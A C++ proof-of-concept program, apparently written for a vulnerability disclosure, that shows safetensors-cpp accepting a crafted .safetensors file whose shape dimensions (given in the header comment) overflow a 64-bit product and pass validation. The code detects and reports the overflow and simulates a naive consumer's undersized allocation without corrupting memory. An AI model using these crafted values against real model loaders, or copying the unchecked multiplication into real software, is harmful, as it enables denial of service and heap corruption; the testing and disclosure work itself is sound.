File size: 6,128 Bytes
4c19aea
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
/**
 * test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp
 *
 * This program loads a malicious .safetensors file where shape dimensions
 * are crafted to overflow uint64 multiplication in get_shape_size().
 *
 * The file passes safetensors-cpp validation because:
 *   shape = [4194305, 4194305, 211106198978564]
 *   get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4)
 *   tensor_size = 4 * sizeof(F32) = 16 bytes
 *   data_offsets = [0, 16] -> data_size = 16 bytes
 *   tensor_size == data_size -> VALIDATION PASSES
 *
 * But the declared shape claims ~3.7 * 10^27 elements.
 *
 * IMPACT: Any code that trusts the shape for buffer allocation or iteration
 * will either:
 *   (a) Attempt a massive allocation (DoS / OOM)
 *   (b) If the consumer's own size computation also overflows, allocate a tiny buffer and write OOB (heap overflow)
 *   (c) Iterate over wrong number of elements, causing OOB reads
 *
 * Compile: g++ -std=c++17 -I safetensors-cpp -o test_overflow test_overflow.cc
 */

#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <vector>
#include <iostream>
#include <limits>

#include "safetensors.hh"

/**
 * Multiplies every dimension of `shape` with overflow detection.
 *
 * On success stores the exact element count in `*product` and returns true.
 * Returns false (leaving `*product` untouched) when the exact product does not
 * fit in 64 bits. A zero dimension makes the exact product zero, so such a
 * shape never counts as overflowing, whatever the other dimensions are.
 */
template <typename Shape>
static bool checked_shape_product(const Shape &shape, uint64_t *product) {
    for (const auto dim : shape) {
        if (dim == 0) {
            *product = 0;
            return true;
        }
    }

    uint64_t acc = 1;
    for (const auto dim : shape) {
        const uint64_t d = static_cast<uint64_t>(dim);
        // acc * d wraps exactly when acc exceeds floor(UINT64_MAX / d).
        if (acc > UINT64_MAX / d) {
            return false;
        }
        acc *= d;
    }
    *product = acc;
    return true;
}

/** Floating-point estimate of the shape product; used only for display. */
template <typename Shape>
static double approx_shape_product(const Shape &shape) {
    double product = 1.0;
    for (const auto dim : shape) {
        product *= static_cast<double>(dim);
    }
    return product;
}

/** Prints the dimensions of `shape` joined by `separator` (nothing if empty). */
template <typename Shape>
static void print_dims(const Shape &shape, const char *separator) {
    for (size_t j = 0; j < shape.size(); j++) {
        if (j > 0) printf("%s", separator);
        printf("%zu", shape[j]);
    }
}

/**
 * Entry point of the PoC.
 *
 * Loads a .safetensors file (argv[1], defaulting to
 * "overflow_tensor.safetensors"), parses it with safetensors-cpp, runs
 * validate_data_offsets(), and reports for every tensor whether the product of
 * its shape dimensions wraps around 64 bits.
 *
 * @return 1 if the file cannot be opened/read or load_from_memory fails,
 *         0 otherwise.
 */
int main(int argc, char *argv[]) {
    const char *filepath = "overflow_tensor.safetensors";
    if (argc > 1) {
        filepath = argv[1];
    }

    printf("=== safetensors-cpp Integer Overflow PoC ===\n\n");

    // Read file into memory
    std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
    if (!ifs.is_open()) {
        fprintf(stderr, "Failed to open %s\n", filepath);
        return 1;
    }
    // tellg() yields -1 on failure; converting that straight to size_t would
    // request an enormous allocation below.
    const std::streamoff end_pos = ifs.tellg();
    if (end_pos < 0) {
        fprintf(stderr, "Failed to determine size of %s\n", filepath);
        return 1;
    }
    const size_t filesize = static_cast<size_t>(end_pos);
    ifs.seekg(0, std::ios::beg);
    std::vector<uint8_t> data(filesize);
    if (filesize > 0 &&
        !ifs.read(reinterpret_cast<char*>(data.data()),
                  static_cast<std::streamsize>(filesize))) {
        fprintf(stderr, "Failed to read %s\n", filepath);
        return 1;
    }
    ifs.close();

    printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize);

    // Parse with safetensors-cpp
    safetensors::safetensors_t st;
    std::string warn, err;

    bool ok = safetensors::load_from_memory(data.data(), data.size(),
                                             filepath, &st, &warn, &err);

    if (!ok) {
        printf("[!] load_from_memory FAILED: %s\n", err.c_str());
        return 1;
    }

    if (!warn.empty()) {
        printf("[!] Warnings: %s\n", warn.c_str());
    }

    printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n");

    // Validate data offsets (this is the check that should catch overflow)
    std::string val_err;
    bool valid = safetensors::validate_data_offsets(st, val_err);
    printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED");
    if (!valid) {
        printf("    Error: %s\n", val_err.c_str());
    }

    // Set once any tensor's shape product is found to exceed 64 bits.
    bool any_overflow = false;

    // Examine the tensor
    for (size_t i = 0; i < st.tensors.size(); i++) {
        std::string key = st.tensors.keys()[i];
        safetensors::tensor_t tensor;
        st.tensors.at(i, &tensor);

        printf("\n[*] Tensor: '%s'\n", key.c_str());
        // NOTE(review): the dtype label is hard-coded for the crafted PoC file;
        // other inputs may carry a different dtype.
        printf("    dtype: F32\n");
        printf("    shape: [");
        print_dims(tensor.shape, ", ");
        printf("]\n");
        printf("    data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]);

        // Values as computed by the library (these are what validation uses).
        size_t shape_size = safetensors::get_shape_size(tensor);
        size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
        size_t tensor_size = dtype_bytes * shape_size;

        // Independent, overflow-checked product over ALL dimensions. This
        // replaces indexing shape[0..2] directly, which read out of bounds for
        // tensors with fewer than three dimensions.
        uint64_t exact_product = 0;
        const bool overflows = !checked_shape_product(tensor.shape, &exact_product);
        const double approx_product = approx_shape_product(tensor.shape);
        any_overflow = any_overflow || overflows;

        printf("\n    [OVERFLOW ANALYSIS]\n");
        if (overflows) {
            printf("    get_shape_size() = %zu  (OVERFLOWED! True value: ~%.1e)\n",
                   shape_size, approx_product);
        } else {
            printf("    get_shape_size() = %zu\n", shape_size);
        }
        printf("    get_dtype_bytes() = %zu\n", dtype_bytes);
        printf("    tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size);
        printf("    data_size = %zu\n", tensor.data_offsets[1] - tensor.data_offsets[0]);
        printf("    tensor_size == data_size? %s\n",
               tensor_size == (tensor.data_offsets[1] - tensor.data_offsets[0]) ? "YES (validation passes!)" : "NO");

        // Demonstrate the danger: a naive consumer trusting shape
        printf("\n    [IMPACT DEMONSTRATION]\n");
        printf("    A consumer that trusts shape dimensions would compute:\n");
        printf("    ");
        print_dims(tensor.shape, " * ");
        printf(" = ");
        if (overflows) {
            printf("OVERFLOW (too large for uint64)\n");
        } else {
            printf("%llu\n", static_cast<unsigned long long>(exact_product));
        }
        printf("    True product > UINT64_MAX: %s\n", overflows ? "YES" : "NO");

        if (!overflows) {
            // Nothing to demonstrate for this tensor; the claims below would
            // be false for a shape whose product fits in 64 bits.
            printf("    Shape product fits in 64 bits; no overflow for this tensor.\n");
            continue;
        }

        // Simulate what a consumer would do
        printf("\n    [SIMULATED CONSUMER BEHAVIOR]\n");

        // Scenario 1: Consumer uses shape for allocation (overflows to small buffer)
        size_t alloc_size = 1;
        for (size_t j = 0; j < tensor.shape.size(); j++) {
            alloc_size *= tensor.shape[j];  // Same overflow!
        }
        alloc_size *= dtype_bytes;
        printf("    Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size);
        printf("    Consumer thinks tensor has: ");
        print_dims(tensor.shape, " * ");
        printf(" = ~%.1e elements\n", approx_product);

        // Show it: allocate the overflowed-size buffer, then show what happens
        // when iterating over shape dimensions
        printf("\n    If consumer allocates %zu bytes but iterates over every declared element:\n", alloc_size);
        printf("    -> HEAP BUFFER OVERFLOW (writing ~%.1e * %zu bytes into %zu byte buffer)\n",
               approx_product, dtype_bytes, alloc_size);
        printf("    This is a critical memory safety vulnerability.\n");
    }

    // Only claim the differential when it was actually observed: at least one
    // shape overflowed AND the library's validation still passed.
    if (valid && any_overflow) {
        printf("\n=== DIFFERENTIAL RESULT ===\n");
        printf("  Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n");
        printf("  C++ (safetensors-cpp): ACCEPTS file, validation passes\n");
        printf("  Impact: A model file that Rust deems invalid is accepted by C++\n");
        printf("          The shape values cause integer overflow, enabling heap corruption\n");
    } else {
        printf("\n=== RESULT ===\n");
        printf("  Overflow NOT reproduced with this file (%s)\n",
               any_overflow ? "validation rejected the file"
                            : "no tensor shape overflows 64 bits");
    }

    return 0;
}